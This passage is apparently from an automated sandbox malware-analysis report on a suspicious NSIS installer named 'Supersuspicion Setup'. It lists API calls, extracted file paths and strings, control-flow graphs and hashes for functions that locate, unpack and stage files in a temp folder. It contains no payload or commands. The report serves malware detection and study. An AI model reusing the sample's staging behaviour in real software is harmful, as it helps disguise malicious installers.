                                          • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 0040574C
                                          • FindClose.KERNEL32(00000000), ref: 0040575D
                                          Strings
                                          • \*.*, xrefs: 00405661
                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405604
                                          • "C:\Users\user\Desktop\ulACwpUCSU.exe", xrefs: 004055F6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2883466363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883546489.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883751238.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                          • String ID: "C:\Users\user\Desktop\ulACwpUCSU.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                          • API String ID: 2035342205-2960928897
                                          • Opcode ID: 25106c92b3c871bc14427ef9fb8c6b07d152e7746fae866eacc9b6d331f36872
                                          • Instruction ID: a1a18f6d4a87cf364f513f4d5348cf8987bf6841df45d5f239a42b9e89fe31fb
                                          • Opcode Fuzzy Hash: 25106c92b3c871bc14427ef9fb8c6b07d152e7746fae866eacc9b6d331f36872
                                          • Instruction Fuzzy Hash: 8051D230905A04FADB216B618C89BBF7AB8DF42714F54803BF445721D2D73C4942EE6E
                                          Function 00406310 Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2883466363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883546489.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883751238.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 743aa33a108d29f9cab5e819e308a9554fb8e98817c33194d1e30fb36f92eda3
                                          • Instruction ID: 49e2905b870d629617cd54a3ad4ea64d750052a334705c7e6b68d35cedeefd19
                                          • Opcode Fuzzy Hash: 743aa33a108d29f9cab5e819e308a9554fb8e98817c33194d1e30fb36f92eda3
                                          • Instruction Fuzzy Hash: 28F17970D00229CBCF28CFA8C8946ADBBB1FF45305F25856ED856BB281D3785A96CF45
                                          Function 00402036 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132comCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CoCreateInstance.OLE32(00407384,?,00000001,00407374,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040208B
                                          • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00407374,?,?), ref: 00402143
                                          Strings
                                          • C:\Users\user\AppData\Local\Temp\terephthalate\edderdun\Stillse\Limejuice\Saereste, xrefs: 004020CB
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2883466363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883546489.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883751238.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: ByteCharCreateInstanceMultiWide
                                          • String ID: C:\Users\user\AppData\Local\Temp\terephthalate\edderdun\Stillse\Limejuice\Saereste
                                          • API String ID: 123533781-994438828
                                          • Opcode ID: 844d7db231ce930ba87aa91d55221135eb66824421c535283c4cff4e72d9e9e5
                                          • Instruction ID: 1053df79af30500630abfeafbcf843dcec04d0d4e3091bc204b5fde3a4f6985c
                                          • Opcode Fuzzy Hash: 844d7db231ce930ba87aa91d55221135eb66824421c535283c4cff4e72d9e9e5
                                          • Instruction Fuzzy Hash: 3B416D71A00209BFCB40EFA4CE88E9E7BB5BF48354B2042A9F911FB2D1D6799D41DB54
                                          Function 0040603A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • FindFirstFileA.KERNELBASE(?,00421548,Invaliditetsprocent209\indoktrineringen.rec,004058F7,Invaliditetsprocent209\indoktrineringen.rec,Invaliditetsprocent209\indoktrineringen.rec,00000000,Invaliditetsprocent209\indoktrineringen.rec,Invaliditetsprocent209\indoktrineringen.rec,?,?,76CD2EE0,00405616,?,C:\Users\user\AppData\Local\Temp\,76CD2EE0), ref: 00406045
                                          • FindClose.KERNEL32(00000000), ref: 00406051
                                          Strings
                                          • Invaliditetsprocent209\indoktrineringen.rec, xrefs: 0040603A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2883466363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883546489.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883751238.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: Find$CloseFileFirst
                                          • String ID: Invaliditetsprocent209\indoktrineringen.rec
                                          • API String ID: 2295610775-2173611331
                                          • Opcode ID: 1aa7e4dc1003f693668b82639e535814eeaefdc3a4332bebb0b1aa5890d42f5a
                                          • Instruction ID: ffb9975cce6792308ede9dbdbab0a2e32819aea082b360212a672f9e7c6ece7a
                                          • Opcode Fuzzy Hash: 1aa7e4dc1003f693668b82639e535814eeaefdc3a4332bebb0b1aa5890d42f5a
                                          • Instruction Fuzzy Hash: 7BD012319490306BC3106B787C0C85B7A599F573317118A33B56AF12F0C7389C7286ED
                                          Function 00406061 Relevance: 4.5, APIs: 3, Instructions: 20libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleHandleA.KERNEL32(?,?,?,0040325C,00000009), ref: 00406073
                                          • LoadLibraryA.KERNELBASE(?,?,?,0040325C,00000009), ref: 0040607E
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 0040608F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2883466363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883546489.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883751238.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: AddressHandleLibraryLoadModuleProc
                                          • String ID:
                                          • API String ID: 310444273-0
                                          • Opcode ID: 14778026069da28af87b9950d589da7dca929d2a00fc8d83b3a738ce3464f0c4
                                          • Instruction ID: 2c1b19e4de550b622e70843c6ca25527790cfa0381149662c4593fbace01eca7
                                          • Opcode Fuzzy Hash: 14778026069da28af87b9950d589da7dca929d2a00fc8d83b3a738ce3464f0c4
                                          • Instruction Fuzzy Hash: 00E0C232A04211ABC321AB749D48D3B73ACAFD8751309493EF50AF6150D734AC21EBBA
                                          Function 00403B19 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345windowstringCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 169 403b19-403b2b 170 403b31-403b37 169->170 171 403c6c-403c7b 169->171 170->171 174 403b3d-403b46 170->174 172 403cca-403cdf 171->172 173 403c7d-403cc5 GetDlgItem * 2 call 403fec SetClassLongA call 40140b 171->173 176 403ce1-403ce4 172->176 177 403d1f-403d24 call 404038 172->177 173->172 178 403b48-403b55 SetWindowPos 174->178 179 403b5b-403b5e 174->179 183 403ce6-403cf1 call 401389 176->183 184 403d17-403d19 176->184 191 403d29-403d44 177->191 178->179 180 403b60-403b72 ShowWindow 179->180 181 403b78-403b7e 179->181 180->181 186 403b80-403b95 DestroyWindow 181->186 187 403b9a-403b9d 181->187 183->184 205 403cf3-403d12 SendMessageA 183->205 184->177 190 403fb9 184->190 193 403f96-403f9c 186->193 195 403bb0-403bb6 187->195 196 403b9f-403bab SetWindowLongA 187->196 192 403fbb-403fc2 190->192 198 403d46-403d48 call 40140b 191->198 199 403d4d-403d53 191->199 193->190 206 403f9e-403fa4 193->206 203 403c59-403c67 call 404053 195->203 204 403bbc-403bcd GetDlgItem 195->204 196->192 198->199 201 403f77-403f90 DestroyWindow EndDialog 199->201 202 403d59-403d64 199->202 201->193 202->201 208 403d6a-403db7 call 405d58 call 403fec * 3 GetDlgItem 202->208 203->192 209 403bec-403bef 204->209 210 403bcf-403be6 SendMessageA IsWindowEnabled 204->210 205->192 206->190 207 403fa6-403faf ShowWindow 206->207 207->190 239 403dc1-403dfd ShowWindow KiUserCallbackDispatcher call 40400e EnableWindow 208->239 240 403db9-403dbe 208->240 213 403bf1-403bf2 209->213 214 403bf4-403bf7 209->214 210->190 210->209 217 403c22-403c27 call 403fc5 213->217 218 403c05-403c0a 214->218 219 403bf9-403bff 214->219 217->203 222 403c40-403c53 SendMessageA 218->222 224 403c0c-403c12 218->224 219->222 223 403c01-403c03 219->223 222->203 223->217 225 403c14-403c1a call 40140b 224->225 226 403c29-403c32 call 40140b 224->226 235 403c20 225->235 226->203 236 403c34-403c3e 226->236 235->217 236->235 243 403e02 239->243 244 403dff-403e00 239->244 240->239 245 403e04-403e32 GetSystemMenu EnableMenuItem SendMessageA 243->245 244->245 246 403e34-403e45 SendMessageA 245->246 247 403e47 245->247 248 403e4d-403e86 call 404021 call 405d36 lstrlenA call 405d58 SetWindowTextA call 401389 246->248 247->248 248->191 257 403e8c-403e8e 248->257 257->191 258 403e94-403e98 257->258 259 403eb7-403ecb DestroyWindow 258->259 260 403e9a-403ea0 258->260 259->193 262 403ed1-403efe CreateDialogParamA 259->262 260->190 261 403ea6-403eac 260->261 261->191 263 403eb2 261->263 262->193 264 403f04-403f5b call 403fec GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 262->264 263->190 264->190 269 403f5d-403f70 ShowWindow call 404038 264->269 271 403f75 269->271 271->193
                                          APIs
                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403B55
                                          • ShowWindow.USER32(?), ref: 00403B72
                                          • DestroyWindow.USER32 ref: 00403B86
                                          • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403BA2
                                          • GetDlgItem.USER32(?,?), ref: 00403BC3
                                          • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403BD7
                                          • IsWindowEnabled.USER32(00000000), ref: 00403BDE
                                          • GetDlgItem.USER32(?,00000001), ref: 00403C8C
                                          • GetDlgItem.USER32(?,00000002), ref: 00403C96
                                          • SetClassLongA.USER32(?,000000F2,?), ref: 00403CB0
                                          • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403D01
                                          • GetDlgItem.USER32(?,00000003), ref: 00403DA7
                                          • ShowWindow.USER32(00000000,?), ref: 00403DC8
                                          • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403DDA
                                          • EnableWindow.USER32(?,?), ref: 00403DF5
                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403E0B
                                          • EnableMenuItem.USER32(00000000), ref: 00403E12
                                          • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403E2A
                                          • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403E3D
                                          • lstrlenA.KERNEL32(Supersuspicion Setup: Installing,?,Supersuspicion Setup: Installing,00422F00), ref: 00403E66
                                          • SetWindowTextA.USER32(?,Supersuspicion Setup: Installing), ref: 00403E75
                                          • ShowWindow.USER32(?,0000000A), ref: 00403FA9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2883466363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883546489.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883751238.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                          • String ID: Supersuspicion Setup: Installing
                                          • API String ID: 3282139019-3553124451
                                          • Opcode ID: ee793e9f516e2da13c3aa51fc91f44a41e00c2883a64dc2cf2643230f3a9d64a
                                          • Instruction ID: 1f8690e76de68066656ca8d54ad2d010e53819933bf2384d883f7e4ba9537b83
                                          • Opcode Fuzzy Hash: ee793e9f516e2da13c3aa51fc91f44a41e00c2883a64dc2cf2643230f3a9d64a
                                          • Instruction Fuzzy Hash: 17C1C071A04205BBDB21AF21ED48D2B7EBCFB44706F40443EF601B11E1C7799942AB6E
                                          Function 00403787 Relevance: 51.0, APIs: 15, Strings: 14, Instructions: 216stringregistrylibraryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 272 403787-40379f call 406061 275 4037a1-4037b1 call 405c94 272->275 276 4037b3-4037e4 call 405c1d 272->276 284 403807-403830 call 403a4c call 4058b4 275->284 280 4037e6-4037f7 call 405c1d 276->280 281 4037fc-403802 lstrcatA 276->281 280->281 281->284 290 403836-40383b 284->290 291 4038b7-4038bf call 4058b4 284->291 290->291 292 40383d-403861 call 405c1d 290->292 297 4038c1-4038c8 call 405d58 291->297 298 4038cd-4038f2 LoadImageA 291->298 292->291 302 403863-403865 292->302 297->298 300 403973-40397b call 40140b 298->300 301 4038f4-403924 RegisterClassA 298->301 315 403985-403990 call 403a4c 300->315 316 40397d-403980 300->316 303 403a42 301->303 304 40392a-40396e SystemParametersInfoA CreateWindowExA 301->304 306 403876-403882 lstrlenA 302->306 307 403867-403874 call 4057f1 302->307 312 403a44-403a4b 303->312 304->300 309 403884-403892 lstrcmpiA 306->309 310 4038aa-4038b2 call 4057c6 call 405d36 306->310 307->306 309->310 314 403894-40389e GetFileAttributesA 309->314 310->291 318 4038a0-4038a2 314->318 319 4038a4-4038a5 call 40580d 314->319 325 403996-4039b3 ShowWindow LoadLibraryA 315->325 326 403a19-403a1a call 4050f1 315->326 316->312 318->310 318->319 319->310 328 4039b5-4039ba LoadLibraryA 325->328 329 4039bc-4039ce GetClassInfoA 325->329 330 403a1f-403a21 326->330 328->329 331 4039d0-4039e0 GetClassInfoA RegisterClassA 329->331 332 4039e6-403a09 DialogBoxParamA call 40140b 329->332 334 403a23-403a29 330->334 335 403a3b-403a3d call 40140b 330->335 331->332 336 403a0e-403a17 call 4036d7 332->336 334->316 337 403a2f-403a36 call 40140b 334->337 335->303 336->312 337->316
                                          APIs
                                            • Part of subcall function 00406061: GetModuleHandleA.KERNEL32(?,?,?,0040325C,00000009), ref: 00406073
                                            • Part of subcall function 00406061: LoadLibraryA.KERNELBASE(?,?,?,0040325C,00000009), ref: 0040607E
                                            • Part of subcall function 00406061: GetProcAddress.KERNEL32(00000000,?), ref: 0040608F
                                          • lstrcatA.KERNEL32(1033,Supersuspicion Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Supersuspicion Setup: Installing,00000000,00000002,C:\Users\user\AppData\Local\Temp\,76CD3410,"C:\Users\user\Desktop\ulACwpUCSU.exe",00000000), ref: 00403802
                                          • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp\terephthalate\edderdun,1033,Supersuspicion Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Supersuspicion Setup: Installing,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403877
                                          • lstrcmpiA.KERNEL32(?,.exe), ref: 0040388A
                                          • GetFileAttributesA.KERNEL32(Call), ref: 00403895
                                          • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp\terephthalate\edderdun), ref: 004038DE
                                            • Part of subcall function 00405C94: wsprintfA.USER32 ref: 00405CA1
                                          • RegisterClassA.USER32(00422EA0), ref: 0040391B
                                          • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403933
                                          • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403968
                                          • ShowWindow.USER32(00000005,00000000), ref: 0040399E
                                          • LoadLibraryA.KERNELBASE(RichEd20), ref: 004039AF
                                          • LoadLibraryA.KERNEL32(RichEd32), ref: 004039BA
                                          • GetClassInfoA.USER32(00000000,RichEdit20A,00422EA0), ref: 004039CA
                                          • GetClassInfoA.USER32(00000000,RichEdit,00422EA0), ref: 004039D7
                                          • RegisterClassA.USER32(00422EA0), ref: 004039E0
                                          • DialogBoxParamA.USER32(?,00000000,00403B19,00000000), ref: 004039FF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2883466363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883546489.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883751238.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                          • String ID: "C:\Users\user\Desktop\ulACwpUCSU.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\terephthalate\edderdun$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$Supersuspicion Setup: Installing$_Nb
                                          • API String ID: 914957316-2759038005
                                          • Opcode ID: d69af52eae453a52e03acfe7140820e929eba722ac2574cb4842baacd9f3a248
                                          • Instruction ID: 361ceaa5e45529a70bb989737ed67fdedcb7c759bf8cf29c3cde223c60b7be46
                                          • Opcode Fuzzy Hash: d69af52eae453a52e03acfe7140820e929eba722ac2574cb4842baacd9f3a248
                                          • Instruction Fuzzy Hash: E661E6B16442007EE720AF659D45F273E6CEB8475AF40407FF941B22E2D67C9D02DA6E
                                          Function 00402C79 Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 343 402c79-402cc7 GetTickCount GetModuleFileNameA call 4059c7 346 402cd3-402d01 call 405d36 call 40580d call 405d36 GetFileSize 343->346 347 402cc9-402cce 343->347 355 402df1-402dff call 402bda 346->355 356 402d07-402d1e 346->356 348 402f18-402f1c 347->348 362 402ed0-402ed5 355->362 363 402e05-402e08 355->363 358 402d20 356->358 359 402d22-402d2f call 4031b6 356->359 358->359 367 402d35-402d3b 359->367 368 402e8c-402e94 call 402bda 359->368 362->348 365 402e34-402e80 GlobalAlloc call 406141 call 4059f6 CreateFileA 363->365 366 402e0a-402e22 call 4031cc call 4031b6 363->366 392 402e82-402e87 365->392 393 402e96-402ec6 call 4031cc call 402f1f 365->393 366->362 395 402e28-402e2e 366->395 372 402dbb-402dbf 367->372 373 402d3d-402d55 call 405982 367->373 368->362 376 402dc1-402dc7 call 402bda 372->376 377 402dc8-402dce 372->377 373->377 388 402d57-402d5e 373->388 376->377 384 402dd0-402dde call 4060d3 377->384 385 402de1-402deb 377->385 384->385 385->355 385->356 388->377 394 402d60-402d67 388->394 392->348 403 402ecb-402ece 393->403 394->377 396 402d69-402d70 394->396 395->362 395->365 396->377 398 402d72-402d79 396->398 398->377 400 402d7b-402d9b 398->400 400->362 402 402da1-402da5 400->402 404 402da7-402dab 402->404 405 402dad-402db5 402->405 403->362 406 402ed7-402ee8 403->406 404->355 404->405 405->377 407 402db7-402db9 405->407 408 402ef0-402ef5 406->408 409 402eea 406->409 407->377 410 402ef6-402efc 408->410 409->408 410->410 411 402efe-402f16 call 405982 410->411 411->348
                                          APIs
                                          • GetTickCount.KERNEL32 ref: 00402C8D
                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\ulACwpUCSU.exe,00000400), ref: 00402CA9
                                            • Part of subcall function 004059C7: GetFileAttributesA.KERNELBASE(00000003,00402CBC,C:\Users\user\Desktop\ulACwpUCSU.exe,80000000,00000003), ref: 004059CB
                                            • Part of subcall function 004059C7: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059ED
                                          • GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\ulACwpUCSU.exe,C:\Users\user\Desktop\ulACwpUCSU.exe,80000000,00000003), ref: 00402CF2
                                          • GlobalAlloc.KERNELBASE(00000040,00409130), ref: 00402E39
                                          Strings
                                          • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402ED0
                                          • Inst, xrefs: 00402D60
                                          • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402E82
                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C86, 00402E51
                                          • C:\Users\user\Desktop, xrefs: 00402CD4, 00402CD9, 00402CDF
                                          • Null, xrefs: 00402D72
                                          • C:\Users\user\Desktop\ulACwpUCSU.exe, xrefs: 00402C93, 00402CA2, 00402CB6, 00402CD3
                                          • soft, xrefs: 00402D69
                                          • "C:\Users\user\Desktop\ulACwpUCSU.exe", xrefs: 00402C79
                                          • Error launching installer, xrefs: 00402CC9
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2883466363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883546489.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883751238.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                          • String ID: "C:\Users\user\Desktop\ulACwpUCSU.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\ulACwpUCSU.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                          • API String ID: 2803837635-537660130
                                          • Opcode ID: 91e4b9dee6fe50fd73dc962a53e9cdaf65c065133738040780962d54176249d0
                                          • Instruction ID: 2a27acbe37a486d3f9fadad6f2898e15cdcbef103c1943e89973ac3215dbffb0
                                          • Opcode Fuzzy Hash: 91e4b9dee6fe50fd73dc962a53e9cdaf65c065133738040780962d54176249d0
                                          • Instruction Fuzzy Hash: BC61C671A40205ABDF20AF64DE89B9A76B4EF00315F20413BF904B72D1D7BC9E418BAD
                                          Function 0040173F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147stringtimeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
